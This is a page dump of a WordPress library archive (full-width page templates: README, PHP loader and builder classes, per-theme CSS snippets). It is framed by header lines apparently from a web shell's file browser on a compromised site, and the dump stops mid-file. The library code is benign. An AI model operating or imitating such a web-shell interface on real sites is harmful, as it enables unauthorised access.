Your IP : 216.73.216.162


Current Path : /home/x/b/o/xbodynamge/namtation/wp-content/
Upload File :
Current File : /home/x/b/o/xbodynamge/namtation/wp-content/full-width-page-templates.tar

README.md000066600000014770151137103270006040 0ustar00# Full-Width Templates
-------------
A composer library which injects, in WordPress Dashboard, a Full-Width option in the Page Template selector.

[![Codacy Badge](https://api.codacy.com/project/badge/Grade/ff19f3a4a9724f5c97f88d64fbbc1493)](https://www.codacy.com/app/andrei.lupu/full-width-page-templates?utm_source=github.com&utm_medium=referral&utm_content=Codeinwp/full-width-page-templates&utm_campaign=Badge_Grade)

#### Supported Builders:
* A plain simple WordPress page
* Elementor

### Compatible themes?
At this moment this library ensures compatibility with the follwing WordPress themes(and more to come):
* [Hestia](https://wordpress.org/themes/hestia/) - by ThemeIsle
* [Hestia Pro](https://themeisle.com/themes/hestia-pro/) - by ThemeIsle
* [Zerif Lite](https://themeisle.com/themes/zerif-lite) - by ThemeIsle
* [ShopIsle](https://wordpress.org/themes/shop-isle/) - by ThemeIsle
* [Orfeo](https://themeisle.com/themes/orfeo) - by ThemeIsle
* [Edge](https://wordpress.org/themes/edge/) - By themefreesia  
* [Experon](https://wordpress.org/themes/experon/) - ThinkUpThemes  
* [Genesis](http://my.studiopress.com/themes/genesis/) - By StudioPress  
* [GeneratePress](https://wordpress.org/themes/generatepress/) - By Tom Usborne   
* [Storefront](https://wordpress.org/themes/storefront/) - by WooThemes/Automattic 
* [TwentyTwelve](https://wordpress.org/themes/twentytwelve/) - by WordPress.org  
* [TwentyThirteen](https://wordpress.org/themes/twentythirteen/) - by WordPress.org  
* [TwentyFourteen](https://wordpress.org/themes/twentyfourteen/) - by WordPress.org  
* [TwentyFifteen](https://wordpress.org/themes/twentyfifteen/) - by WordPress.org  
* [TwentySixteen](https://wordpress.org/themes/twentysixteen/) - by WordPress.org  
* [TwentySeventeen](https://wordpress.org/themes/twentyseventeen/) - by WordPress.org   
* [Vantage](https://wordpress.org/themes/vantage/) - by Greg Priday  
* [Virtue](https://wordpress.org/themes/virtue/) - by Kadence Themes   
* [Enlightenment](https://wordpress.org/themes/enlightenment/) - by Daniel Tara
* [Actions](https://wordpress.org/themes/actions/) - by WPDevHQ
* [ActionsPro](https://wpdevhq.com/themes/actions-pro/) - by WPDevHQ
* [Kale](https://wordpress.org/themes/kale/) - by lyrathemes
* [InVogue](https://wordpress.org/themes/invogue) - by Kaira
* [Universal-Store](https://wordpress.org/themes/universal-store/) - by Themes4WP
* [Editorial](https://wordpress.org/themes/editorial/) - by Mystery Themes
* [Renden Business](https://wordpress.org/themes/renden-business/) - by ThinkUpThemes
* [Spacious](https://wordpress.org/themes/spacious/) - by ThemeGrill
* [Flash](https://wordpress.org/themes/spacious/) - by ThemeGrill
* [Writee](https://wordpress.org/themes/writee/) - by Scissor Themes
* [VT Blogging](https://wordpress.org/themes/vt-blogging/) - by VolThemes
* [One Page Express](https://wordpress.org/themes/one-page-express/) - by horearadu
* [Primer](https://wordpress.org/themes/primer/) - by GoDaddy
* [Vantage](https://wordpress.org/themes/vantage/) - by SiteOrigin
* [Customizr](https://wordpress.org/themes/customizr/) - by Nicolas Guillaume
* [Nikko Portfolio](https://wordpress.org/themes/nikko-portfolio/) - by Colormelon
* [Poseidon](https://wordpress.org/themes/poseidon/) - by ThemeZee
* [Envo Business](https://wordpress.org/themes/envo-business/) - by EnvoThemes
* [Hueman](https://wordpress.org/themes/hueman/) - by Nicolas Guillaume
* [News Portal](https://wordpress.org/themes/news-portal/) - by Mystery Themes
* [Illdy](https://wordpress.org/themes/illdy/) - by Silkalns
* [Envy Blog](https://wordpress.org/themes/envy-blog/) - by Precise Themes
* [Avant](https://wordpress.org/themes/avant/) - by Kaira
* [OceanWP](https://wordpress.org/themes/oceanwp/) - by oceanwp
* [Astra](https://wordpress.org/themes/astra/) - by Brainstorm Force
* [Mesmerize](https://wordpress.org/themes/mesmerize/) - by horearadu
* [Sydney](https://wordpress.org/themes/sydney/) - by athemes
* [Ashe](https://wordpress.org/themes/ashe/) - by Royal Flush
* [Lodestar](https://wordpress.org/themes/lodestar/) - by Automattic
* [Total](https://wordpress.org/themes/total/) - by Hash Themes
* [Consulting](https://wordpress.org/themes/consulting/) - by ThinkUpThemes
* [ColorMag](https://wordpress.org/themes/colormag/) - by ThemeGrill
* [OnePress](https://wordpress.org/themes/onepress/) - by FameThemes
* [Shapely](https://wordpress.org/themes/shapely/) - by Silkalns
* [HitMag](https://wordpress.org/themes/hitmag/) - by ThemezHut
* [Divi](https://www.elegantthemes.com/gallery/divi) - by Elegant Themes

### How to use it?
Well, this is a Composer library so you will need to add this it as a dependency on your project( either plugin or a theme ) like this:
```
"require": {
    "codeinwp/full-width-page-templates": "master"
}
```
And run a via the terminal a `composer install` and hope that you have Composer installed globally.

The last step is the initialization. Call this wherever you like:
```
if ( class_exists( '\ThemeIsle\FullWidthTemplates' ) ) {
    \ThemeIsle\FullWidthTemplates::instance();
}
```

### Work with this repository?
To work directly with this repository, I use and recommend the following way.

Clone this repository inside the [mu-plugins](https://codex.wordpress.org/Must_Use_Plugins) WordPress directory. This way, we can be sure that the cloned version of this 
library will have priority before the one loaded from Composer.
After cloning you need to create a php file, like `load-fwt-lib.php`(I'm so bad at naming) and inside you will need to require the loader like this:
```
<?php
require_once( dirname( __FILE__ ) . '/full-width-page-templates/load.php' );
```

### How to make a theme compatible with the full-width template?

To add a new theme to the compatibility list, clone this repository(as we talked above) create a new directory with the
theme's name in the `themes` directory.
This theme directory supports two files:

* `inline-style.php` - A file loaded at the right moment to add an inline style
* `functions.php` - An optional file to add actions and filters.

Our goal here is to add a CSS snippet which will make sure that the page container width full.
So make use of the `inline-style.php` and add a snipet like this:
```
<?php
/* Support for the {Theme Name} theme */
$style = '.page-template-builder-fullwidth-std .site-content {
    width: 100%;
    padding: 0;
    margin:0;
}';
wp_add_inline_style( '{theme-style}', $style );
```
Where `{theme-style}` must be an enqueued style.(For example, Twenty Seventeen has 'twentyseventeen-style')

Don't forget to add the new theme to this README.md ;)
load.php000066600000000512151137103270006176 0ustar00<?php
/**
 * Loader for the ThemeIsle\FullWidthTemplates
 *
 * @package     ThemeIsle\FullWidthTemplates
 * @copyright   Copyright (c) 2017, Andrei Lupu
 * @license     http://opensource.org/licenses/gpl-2.0.php GNU Public License
 * @since       1.0.0
 */

require_once( dirname( __FILE__ ) . '/class-full-width-templates.php' );builders/class-elementor-full-width-templates.php000066600000006250151137103270016243 0ustar00<?php
/**
 * Class ThemeIsle\FullWidthTemplates\Elementor
 *
 * @package     ThemeIsle\FullWidthTemplates\Elementor
 * @copyright   Copyright (c) 2017, Andrei Lupu
 * @license     http://opensource.org/licenses/gpl-2.0.php GNU Public License
 * @since       1.0.0
 */

namespace ThemeIsle\FullWidthTemplates;

class Elementor {
	/**
	 * @var Elementor
	 */
	public static $instance = null;

	protected function init(){
		// for the blank template
		add_action( 'fwpt_blank_before_content', array( $this, 'render_blank_before_content' ) );
		add_action( 'fwpt_blank_content', array( $this, 'render_content' ) );
		add_action( 'fwpt_blank_after_content', array( $this, 'render_blank_after_content' ) );

		// for the standard template
		add_action( 'fwpt_std_content', array( $this, 'render_content' ) );
		add_action( 'fwpt_std_before_content', array( $this, 'render_std_before_content' ) );
		add_action( 'fwpt_std_after_content', array( $this, 'render_std_after_content' ) );

		// @TODO We should move this into a function to keep compat?
		add_action( 'elementor_page_elements', array( $this, 'elementor_page_content' ), 20 );
	}

	/**
	 * Display the WordPress loop
	 */
	public function render_content() {
		while ( have_posts() ) : the_post();
			do_action( 'elementor_page_elements' ); // Give your elements priorities so that they hook in the right place.
		endwhile;
	}

	/**
	 * Display the header of the Blank template
	 */
	public function render_blank_before_content() {
		do_action( 'elementor_content_body_before' );
		do_action( 'elementor_before_content_wrapper' );
	}

	/**
	 * Display the footer of the blank template
	 */
	public function render_blank_after_content() {
		do_action( 'elementor_after_content_wrapper' );
		do_action( 'elementor_content_body_after' );
	}

	/**
	 * Display the header of the standard template
	 */
	public function render_std_before_content() {
		get_header();
		do_action( 'elementor_before_content_wrapper' );
	}

	/**
	 * Display the footer of the standard template
	 */
	public function render_std_after_content() {
		do_action( 'elementor_after_content_wrapper' );
		get_footer();
	}

	// @TODO We should move this into a function to keep compat?
	function elementor_page_content() {
		the_content();
	}

	/**
	 * @static
	 * @since 1.0.0
	 * @access public
	 * @return Elementor
	 */
	public static function instance() {
		if ( is_null( self::$instance ) ) {
			self::$instance = new self();
			self::$instance->init();
		}

		return self::$instance;
	}

	/**
	 * Throw error on object clone
	 *
	 * The whole idea of the singleton design pattern is that there is a single
	 * object therefore, we don't want the object to be cloned.
	 *
	 * @access public
	 * @since 1.0.0
	 * @return void
	 */
	public function __clone() {
		// Cloning instances of the class is forbidden.
		_doing_it_wrong( __FUNCTION__, esc_html__( 'Cheatin&#8217; huh?', 'themeisle-companion' ), '1.0.0' );
	}

	/**
	 * Disable unserializing of the class
	 *
	 * @access public
	 * @since 1.0.0
	 * @return void
	 */
	public function __wakeup() {
		// Unserializing instances of the class is forbidden.
		_doing_it_wrong( __FUNCTION__, esc_html__( 'Cheatin&#8217; huh?', 'themeisle-companion' ), '1.0.0' );
	}
}builders/class-none-full-width-templates.php000066600000004031151137103270015203 0ustar00<?php
/**
 * Class ThemeIsle\FullWidthTemplates\Elementor
 *
 * @package     ThemeIsle\FullWidthTemplates\Elementor
 * @copyright   Copyright (c) 2017, Andrei Lupu
 * @license     http://opensource.org/licenses/gpl-2.0.php GNU Public License
 * @since       1.0.0
 */

namespace ThemeIsle\FullWidthTemplates;

class None {
	/**
	 * @var Elementor
	 */
	public static $instance = null;

	protected function init(){
		// for the standard template
		add_action( 'fwpt_std_content', array( $this, 'render_content' ) );
		add_action( 'fwpt_std_before_content', array( $this, 'render_std_before_content' ) );
		add_action( 'fwpt_std_after_content', array( $this, 'render_std_after_content' ) );

	}

	/**
	 * Display the WordPress loop
	 */
	public function render_content() {
		while ( have_posts() ) : the_post();
			the_content();
		endwhile;
	}


	/**
	 * Display the header of the standard template
	 */
	public function render_std_before_content() {
		get_header();
	}

	/**
	 * Display the footer of the standard template
	 */
	public function render_std_after_content() {
		get_footer();
	}


	/**
	 * @static
	 * @since 1.0.0
	 * @access public
	 * @return Elementor
	 */
	public static function instance() {
		if ( null ===  self::$instance ) {
			self::$instance = new self();
			self::$instance->init();
		}

		return self::$instance;
	}

	/**
	 * Throw error on object clone
	 *
	 * The whole idea of the singleton design pattern is that there is a single
	 * object therefore, we don't want the object to be cloned.
	 *
	 * @access public
	 * @since 1.0.0
	 * @return void
	 */
	public function __clone() {
		// Cloning instances of the class is forbidden.
		_doing_it_wrong( __FUNCTION__, esc_html__( 'Cheatin&#8217; huh?', 'themeisle-companion' ), '1.0.0' );
	}

	/**
	 * Disable unserializing of the class
	 *
	 * @access public
	 * @since 1.0.0
	 * @return void
	 */
	public function __wakeup() {
		// Unserializing instances of the class is forbidden.
		_doing_it_wrong( __FUNCTION__, esc_html__( 'Cheatin&#8217; huh?', 'themeisle-companion' ), '1.0.0' );
	}
}themes/spacious/inline-style.php000066600000002112151137103270013004 0ustar00<?php
/* Support for Spacious theme */
$spacious = '	
		.page-template-builder-fullwidth-std {
			padding: 0;
		}
		.page-template-builder-fullwidth-std #page {
			margin: 0;
			max-width: 100%;
		}
		.page-template-builder-fullwidth-std #page #main {
			padding: 0;
		}
		.page-template-builder-fullwidth-std #page #main .inner-wrap {
			max-width: 100%;
		}
		@media (max-width: 1308px) {
			.page-template-builder-fullwidth-std #page,
			.page-template-builder-fullwidth-std #page #main .inner-wrap {
				 width: 100%;
			}
		}
		@media (max-width: 768px) {
			.page-template-builder-fullwidth-std .site-header #header-text-nav-container {
				border-bottom: none;
			}
			.page-template-builder-fullwidth-std .site-header .inner-wrap {
				width: 100%;
			}
			.page-template-builder-fullwidth-std .site-header .inner-wrap #header-text-nav-wrap {
			    padding: 0;
			}
		}		
		.page-template-builder-fullwidth-std .site-header .header-post-title-container {
			display: none;
		}
		.page-template-builder-fullwidth {
			padding: 0;
		}
	';
wp_add_inline_style( 'spacious_style', $spacious );
themes/renden/inline-style.php000066600000000613151137103270012435 0ustar00<?php
/* Support for Renden theme */
$renden = '
		.page-template-builder-fullwidth-std #site-header #intro {
			display: none;
		}
		.page-template-builder-fullwidth-std #body-core #content {
			padding: 0;
		}		
		.page-template-builder-fullwidth-std #body-core #content #content-core {
			padding: 0;
			margin: 0;
			max-width: 100%;
		}
	';
wp_add_inline_style( 'thinkup-style', $renden );
themes/genesis/inline-style.php000066600000001233151137103270012616 0ustar00<?php
	/* Support for Genesis theme */
	$genesis = '
		.page-template-builder-fullwidth .site-inner,
		.page-template-builder-fullwidth-std .site-inner {
            max-width: 100%;
			width: 100%;
            padding: 0;
			margin: 0;			
        }
		.page-template-builder-fullwidth .elementor-page,
		.page-template-builder-fullwidth-std .elementor-page .site-inner {
            padding-top: 0;
			max-width: 100%;
			width: 100%;
            overflow: hidden;			
        }
		@media only screen and (max-width: 860px) {
			.page-template-builder-fullwidth-std .site-inner {
				padding: 0;				
			}
		}
	';
	wp_add_inline_style( 'elementor-frontend', $genesis );
themes/ashe/inline-style.php000066600000000326151137103270012103 0ustar00<?php
	/* Support for Ashe theme */
	$ashe = '
			@media (min-width: 979px) {
				.page-template-builder-fullwidth-std #main-nav {
					overflow: hidden;
				}
			}
		';
	wp_add_inline_style( 'ashe-style', $ashe);
themes/envy-blog/inline-style.php000066600000000437151137103270013070 0ustar00<?php
/* Support for Envy Blog theme */
$envyblog = '
		.page-template-builder-fullwidth-std .container {
			padding: 0;
			margin: 0;
			width: 100%;
		}
		.page-template-builder-fullwidth-std #breadcrumb {
			display: none;
		}
	';
wp_add_inline_style( 'envy-blog-style', $envyblog );
themes/envo-business/inline-style.php000066600000000322151137103270013757 0ustar00<?php
/* Support for Envo Business theme */
$envob = '
		.page-template-builder-fullwidth-std .main-container {
			padding: 0;
			width: 100%;
		}
	';
wp_add_inline_style( 'envo-business-stylesheet', $envob );
themes/edge/inline-style.php000066600000001021151137103270012060 0ustar00<?php
	/* Support for Virtue theme */
	$edge = '
		.page-template-builder-fullwidth-std #content {
            padding: 0;
        }
		.page-template-builder-fullwidth-std #content .container {
            max-width: 100%;
        }
		.page-template-builder-fullwidth-std .page-header {
            display: none;
        }
		@media only screen and (max-width: 1023px) {
			.page-template-builder-fullwidth-std #content .container {
                width: 100%;
            }
		}
	';
	wp_add_inline_style( 'edge-style', $edge );
themes/twentytwelve/inline-style.php000066600000000476151137103270013752 0ustar00<?php
	/* Support for Twenty Twelve theme */
	$style = '
			.page-template-builder-fullwidth-std #page {
				padding: 0;
				margin: 0;
				max-width: 100%;
			}
			.page-template-builder-fullwidth-std #page .site-header {
				padding: 0 2.857142857rem;
			}
		';
	wp_add_inline_style( 'twentytwelve-style', $style );
themes/vogue/inline-style.php000066600000000456151137103270012314 0ustar00<?php
/* Support for Vogue theme */
$vogue = '
		.page-template-builder-fullwidth-std #page > .site-container {
			padding: 0;
			margin: 0;
			max-width: 100%;
		}
		.page-template-builder-fullwidth-std .site-footer-bottom-bar {
			display: none;
		}
	';
wp_add_inline_style( 'vogue-style', $vogue );
themes/virtue/inline-style.php000066600000000634151137103270012503 0ustar00<?php
/* Support for Virtue theme */
$virtue = '.page-template-builder-fullwidth .headerclass,
.page-template-builder-fullwidth .footerclass {
    display: none;
}
.page-template-builder-fullwidth .contentclass,
.page-template-builder-fullwidth-std .contentclass {
    padding-bottom: 0;
}
.page-template-builder-fullwidth .contentclass {
    padding-top: 0;
}';
wp_add_inline_style( 'kadence_theme', $virtue );
themes/poseidon/inline-style.php000066600000000577151137103270013013 0ustar00<?php
/* Support for Poseidon theme */
$poseidon = '
		.page-template-builder-fullwidth-std .site-header {
			border-bottom: none;
		}
		.page-template-builder-fullwidth-std .site-content {
			padding: 0;
			margin: 0;
			max-width: 100%;
		}
		.page-template-builder-fullwidth-std .footer-wrap {
			border-top: none;
		}
	';
wp_add_inline_style( 'poseidon-stylesheet', $poseidon );
themes/hueman/inline-style.php000066600000001056151137103270012441 0ustar00<?php
/* Support for Hueman theme */
$hueman = '
		.page-template-builder-fullwidth-std #header {
			padding-bottom: 0;
		}
		.page-template-builder-fullwidth-std #wrapper #page {
			padding: 0;
			margin: 0;	
		}
		.page-template-builder-fullwidth-std #wrapper #page .container-inner {
			max-width: 100%;
		}
		.page-template-builder-fullwidth-std #wrapper #page .container-inner .main-inner {
			padding: 0;
		}
		.page-template-builder-fullwidth-std #footer #nav-footer {
			border-top: none;
		}
	';
wp_add_inline_style( 'hueman-main-style', $hueman );
themes/hitmag/inline-style.php000066600000001422151137103270012432 0ustar00<?php
/* Support for HitMag theme */
$hitmag = '
		.page-template-builder-fullwidth-std .hitmag-wrapper {
			margin: 0;
			max-width: 100%;
		}
		.page-template-builder-fullwidth-std .hitmag-wrapper .site-content {
			padding: 0;
		}
		.page-template-builder-fullwidth-std .hitmag-wrapper .site-header .hm-container {
			padding: 0 40px;
		}
		.page-template-builder-fullwidth-std .hitmag-wrapper .hm-container {
			padding: 0;
			margin: 0;
			max-width: 100%;
		}
		.page-template-builder-fullwidth-std .hm-top-bar {
			display: none;
		}
		.page-template-builder-fullwidth-std .site-header {
			margin: 0;
		}
		.page-template-builder-fullwidth-std .hitmag-wrapper .site-footer {
			padding: 0 40px;
			background-color: #222;
		}
	';
wp_add_inline_style( 'hitmag-style', $hitmag );
themes/news-portal/inline-style.php000066600000000745151137103270013443 0ustar00<?php
/* Support for News Portal theme */
$newsportal = '
		.page-template-builder-fullwidth-std #page .site-content,
		 .page-template-builder-fullwidth-std #page .site-footer {
			margin: 0;
		}
		.page-template-builder-fullwidth-std #page .site-content .mt-container {
			width: 100%;
		}
		@media (max-width: 1200px) {
			.page-template-builder-fullwidth-std #page .site-content .mt-container {
				padding: 0;
			}
		}
	';
wp_add_inline_style( 'news-portal-style', $newsportal );
themes/twentyfifteen/inline-style.php000066600000001174151137103270014060 0ustar00<?php
	/* Support for Twenty Fifteen theme */
	$style = '
	    body.page-template-builder-fullwidth:before {
		    display: none;
	    }
		.page-template-builder-fullwidth .site,
		.page-template-builder-fullwidth-std .site	{
            max-width: 100%;
			margin: 0;
        }
        .page-template-builder-fullwidth .elementor-page	{
            overflow: hidden;
        }
        body.page-template-builder-fullwidth-std:before {
		    width: 29.4118%;
	    }		
		.page-template-builder-fullwidth-std .site-footer {
            width: 71%;
			margin-left: 29%;
        }
	';
	wp_add_inline_style( 'twentyfifteen-style', $style );
themes/maxstore/inline-style.php000066600000000331151137103270013021 0ustar00<?php
/* Support for MaxStore theme */
$maxstore = '
			.page-template-builder-fullwidth-std .rsrc-footer .rsrc-author-credits {
				border-top: none;
			}
	';
wp_add_inline_style( 'maxstore-stylesheet', $maxstore);

themes/lodestar/inline-style.php000066600000000301151137103270012771 0ustar00<?php
	/* Support for Lodestar theme */
	$lodestar = '
				.page-template-builder-fullwidth-std .site-content {
					padding: 0;
				}
			';
	wp_add_inline_style( 'lodestar-style', $lodestar);
themes/flash/inline-style.php000066600000000646151137103270012265 0ustar00<?php
/* Support for Flash theme */
$flash = '
		.page-template-builder-fullwidth-std #page #flash-breadcrumbs {
			display: none;
		}
		.page-template-builder-fullwidth-std .site-content .tg-container {
			max-width: 100%;
		} 
		@media (max-width: 1200px) {
			.page-template-builder-fullwidth-std .site-content .tg-container {
				padding: 0;
				width: 100%;
			}
		}
	';
wp_add_inline_style( 'flash-style', $flash );
themes/zerif-lite/functions.php000066600000000272151137103270012631 0ustar00<?php

/**
 * adds the closing <header> tag
 */
function zerif_close_header() {
	echo '</header> <!-- / END HOME SECTION  -->';
}
add_action( 'fwpt_std_content', 'zerif_close_header' );
themes/zerif-lite/inline-style.php000066600000000440151137103270013232 0ustar00<?php
/* Support for Zerif Lite theme */
$style = '
		.page-template-builder-fullwidth {
			overflow: hidden;
		}
		@media (min-width: 768px) {
			.page-template-builder-fullwidth-std .header > .elementor {
				padding-top: 76px;
			}
		}
';
wp_add_inline_style( 'zerif_style', $style );
themes/storefront/inline-style.php000066600000000643151137103270013372 0ustar00<?php
	/* Support for Storefront theme */
	$css = '
		.page-template-builder-fullwidth-std .site-header {
			border: none;
		}
		.page-template-builder-fullwidth-std .site-content .col-full {
            max-width: 100%;
            padding: 0;
			margin: 0;
        }
		
		.page-template-builder-fullwidth-std .site-header {
           margin-bottom: 0;
        }
	';
	wp_add_inline_style( 'storefront-style', $css );
themes/twentythirteen/inline-style.php000066600000000745151137103270014265 0ustar00<?php
	/* Support for Twenty Thirteen theme */
	$thirteen = '
	    .page-template-builder-fullwidth-std .site {
            max-width: 100%;
            border: none;
        }
        .page-template-builder-fullwidth-std .site-header {
            max-width: 100%;
			background-size: 3200px auto;
        }
		.page-template-builder-fullwidth-std .navbar {
            max-width: 100%;
            width: 100%;
        }
	';
	wp_add_inline_style( 'twentythirteen-style', $thirteen );
themes/primer/inline-style.php000066600000000421151137103270012455 0ustar00<?php
/* Support for Primer theme */
$primer = '
		.page-template-builder-fullwidth-std .page-title-container {
			display: none;
		}
		.page-template-builder-fullwidth-std .site-content {
			margin: 0;
			max-width: 100%;
		}
	';
wp_add_inline_style( 'primer', $primer );
themes/twentyseventeen/inline-style.php000066600000000524151137103270014432 0ustar00<?php
/* Support for Twenty Seventeen theme */
$style = '.elementor-editor-active .site-content {
	padding: 2.5em 0 0;
}
.elementor-page .site-content {
	padding: 0;
}
.elementor-page.page:not(.home) #content {
	padding-bottom: 0;
}
.elementor-page .site-footer {
	margin-top: 0;
}';
wp_add_inline_style( 'twentyseventeen-style', $style );
themes/astra/inline-style.php000066600000000344151137103270012275 0ustar00<?php
	/* Support for Astra theme */
	$astra = '
			.page-template-builder-fullwidth-std #content .ast-container {
				max-width: 100%;
				padding: 0;
				margin: 0;
			}
		';
	wp_add_inline_style( 'astra-theme-css', $astra );
themes/twentyfourteen/inline-style.php000066600000000625151137103270014267 0ustar00<?php
	/* Support for Twenty Fourteen theme */
	$style = '
	    .page-template-builder-fullwidth-std #page {
            max-width: 100%;
        }
        .page-template-builder-fullwidth-std .site::before {
            display: none;
        }
        .page-template-builder-fullwidth-std .site-header {
            max-width: 100%;
        }
	';
	wp_add_inline_style( 'twentyfourteen-style', $style );
themes/kale/inline-style.php000066600000000451151137103270012076 0ustar00<?php
/* Support for Kyle theme */
$kyle = '
		.page-template-builder-fullwidth-std .main-wrapper .container {
			padding: 0;
			margin: 0;
			width: 100%;
		}
		.page-template-builder-fullwidth-std .header > *:last-child {
			margin-bottom: 0;
		}
	';
wp_add_inline_style( 'kale-style', $kyle );
themes/colormag/inline-style.php000066600000000624151137103270012767 0ustar00<?php
/* Support for Colormag theme */
$colormag = '
		.page-template-builder-fullwidth-std #main {
			padding: 0;
		}
		.page-template-builder-fullwidth-std #main .inner-wrap {
			margin: 0;
			max-width: 100%;
		}
		@media (max-width: 1190px) {
			.page-template-builder-fullwidth-std #main .inner-wrap {
				margin: 0;
				width: 100%;
			}
		}
	';
wp_add_inline_style( 'colormag_style', $colormag );
themes/actions/inline-style.php000066600000000666151137103270012632 0ustar00<?php
	/* Support for Actions theme */
	$style = '
		.page-template-builder-fullwidth .main-content-area .main,
        .page-template-builder-fullwidth-std .main-content-area .main  {
            margin: 0 auto;
            width: 100%;
            max-width: 100%;
        }
	';
if ( is_child_theme() || ! is_admin() ) {
	wp_add_inline_style( 'actions-child-style', $style );
} else {
	wp_add_inline_style( 'actions-style', $style );
}
themes/avant/inline-style.php000066600000000437151137103270012277 0ustar00<?php
/* Support for Avant theme */
$avant = '
		.page-template-builder-fullwidth-std #page > .site-container {
			padding: 0;
			margin: 0;
			max-width: 100%;
		}
		.page-template-builder-fullwidth-std .site-footer {
			margin: 0;
		}
	';
wp_add_inline_style( 'avant-style', $avant );
themes/vt-blogging/inline-style.php000066600000000321151137103270013375 0ustar00<?php
/* Support for VT Blogging theme */
$vtb = '
		.page-template-builder-fullwidth-std .site-content {
			padding: 0;
			margin: 0;
			width: 100%;
		}
	';
wp_add_inline_style( 'vt-blogging-style', $vtb );
themes/total/inline-style.php000066600000000251151137103270012303 0ustar00<?php
/* Support for Total theme */
$total = '
		.page-template-builder-fullwidth-std #ht-colophon {
			margin: 0;
		}
	';
wp_add_inline_style( 'total-style', $total );
themes/hestia/inline-style.php000066600000000273151137103270012441 0ustar00<?php
/* Support for Hestia theme */
$hestia = '
		.page-template-builder-fullwidth-std .header > .elementor {
			padding-top: 70px;
		}
';
wp_add_inline_style( 'hestia_style', $hestia);
themes/consulting/inline-style.php000066600000000573151137103270013354 0ustar00<?php
/* Support for Consulting theme */
$consulting = '
		.page-template-builder-fullwidth-std #site-header #intro {
			display: none;
		}
		.page-template-builder-fullwidth-std #content {
			padding: 0;
		}
		.page-template-builder-fullwidth-std #content #content-core {
			margin: 0;
			max-width: 100%;
		}
	';
wp_add_inline_style( 'consulting-thinkup-style', $consulting );
themes/enlightenment/inline-style.php000066600000000334151137103270014023 0ustar00<?php
	/* Support for Actions theme */
	$style = '
		.elementor-body .site {
			overflow-x: visible;
		}
		.elementor-body .navbar-fixed-top {
			z-index: 1;
		}
	';
	wp_add_inline_style( 'elementor-frontend', $style );
themes/twentysixteen/inline-style.php000066600000004111151137103270014111 0ustar00<?php
	/* Support for Twenty Sixteen theme */
	$style = '	    
		body.page-template-builder-fullwidth.elementor-page,
		body.page-template-builder-fullwidth-std.elementor-page {
			background: transparent;
		}
		.page-template-builder-fullwidth-std .site {
			margin: 0;
		}
		.page-template-builder-fullwidth .elementor-page,
        .page-template-builder-fullwidth-std .elementor-page {
	        overflow: hidden;
        }
		.page-template-builder-fullwidth .full-width,
        .page-template-builder-fullwidth-std .full-width {
	        width: 100%;
        }
        .page-template-builder-fullwidth .site-inner,
        .page-template-builder-fullwidth-std .site-inner {
            max-width: 100%;
        }
        .page-template-builder-fullwidth .site-content,
        .page-template-builder-fullwidth-std .site-content {
            padding: 0;
        }
        .page-template-builder-fullwidth header#masthead,
        .page-template-builder-fullwidth footer#colophon,
        .page-template-builder-fullwidth-std header#masthead,
        .page-template-builder-fullwidth-std footer#colophon {
	        margin: 0 auto;
	        max-width: 1320px;
        } 
        .page-template-builder-fullwidth .entry-content,
        .page-template-builder-fullwidth-std .entry-content {
	        margin-right: auto;
	        margin-left: auto;
        }
        @media screen and (min-width: 56.875em) {
	        .admin-bar .anchor-menu {
		        top: 20px;
	        }	
			.admin-bar .anchor-menu-fixed.anchor-menu, .admin-bar .anchor-menu-fixed.elementor-widget-wp-widget-nav_menu {
				top: 54px !important;
			}			
			.page-template-builder-fullwidth .entry-content,
            .page-template-builder-fullwidth-std .entry-content	{
	            margin-right: auto;
	            margin-left: auto;
	        }
        }
        @media screen and (min-width: 44.375em) {	        
			.page-template-builder-fullwidth .entry-content,
            .page-template-builder-fullwidth-std .entry-content {
	            margin-right: auto;;
	        }
        }
	';
	wp_add_inline_style( 'twentysixteen-style', $style );
themes/vantage/inline-style.php000066600000000632151137103270012610 0ustar00<?php
	/* Support for Vantage theme */
	$vantage = '
		.page-template-builder-fullwidth-std #main {
            padding: 0;
	        max-width: 100%;
        }

        .page-template-builder-fullwidth-std.responsive.layout-full #main .full-container {
            max-width: 100%;
            margin-left: auto;
            margin-right: auto;
        }
	';
	wp_add_inline_style( 'vantage-style', $vantage );
themes/online-shop/inline-style.php000066600000000741151137103270013417 0ustar00<?php
/* Support for Online Shop theme */
$style = '
		.page-template-builder-fullwidth-std .site-header .header-wrapper {
			padding-bottom: 0;
		}
		.page-template-builder-fullwidth-std .site-content {
			width: 100%;
		}
		.page-template-builder-fullwidth-std .site-content .breadcrumbs {
			display: none;
		}
		@media (max-width: 992px) {
			.page-template-builder-fullwidth-std .site-content {
				padding: 0;
			}
		}
	';
wp_add_inline_style( 'online-shop-style', $style );
themes/oceanwp/inline-style.php000066600000000270151137103270012615 0ustar00<?php
	/* Support for OceanWP theme */
	$oceanwp = '
		.page-template-builder-fullwidth-std .page-header {
			display: none;
		}
	';
	wp_add_inline_style( 'oceanwp-style', $oceanwp );
themes/writee/inline-style.php000066600000000306151137103270012460 0ustar00<?php
/* Support for Writee theme */
$writee = '
		.page-template-builder-fullwidth-std p,
		 .page-template-builder-fullwidth p {
			margin: 0;
		}
	';
wp_add_inline_style( 'WRT-style', $writee );
themes/experon/inline-style.php000066600000000543151137103270012644 0ustar00<?php
	/* Support for Virtue theme */
	$experon = '
		.page-template-builder-fullwidth-std #content {
            padding: 0;
        }
		.page-template-builder-fullwidth-std #content-core {
            max-width: 100%;
        }
		.page-template-builder-fullwidth-std #intro {
			display: none;
		}
	';
	wp_add_inline_style( 'thinkup-style', $experon );
themes/shapely/inline-style.php000066600000001053151137103270012626 0ustar00<?php
/* Support for Shapely theme */
$shapely = '
		.page-template-builder-fullwidth-std .site .main-container .page-title-section {
			display: none;
		}
		.page-template-builder-fullwidth-std .site .main-container .content-area {
			padding: 0;
		}
		.page-template-builder-fullwidth-std .site .main-container .content-area .container {
			padding: 0;
			margin: 0;
			width: 100%;
		}
		.page-template-builder-fullwidth-std section {
			padding: 0;
			position: initial;
			overflow: initial;
		}
	';
wp_add_inline_style( 'shapely-style', $shapely );
themes/nikko-portfolio/inline-style.php000066600000000267151137103270014315 0ustar00<?php
/* Support for Nikko Portfolio theme */
$style = '
		.page-template-builder-fullwidth-std #page {
			padding: 0;
		}
	';
wp_add_inline_style( 'nikko-portfolio-style', $style );
themes/editorial/inline-style.php000066600000000605151137103270013137 0ustar00<?php
/* Support for Editorial theme */
$editorial = '
			.page-template-builder-fullwidth-std {
				display: none;
			}
			.page-template-builder-fullwidth-std #masthead {
				margin-bottom: 0;
			}
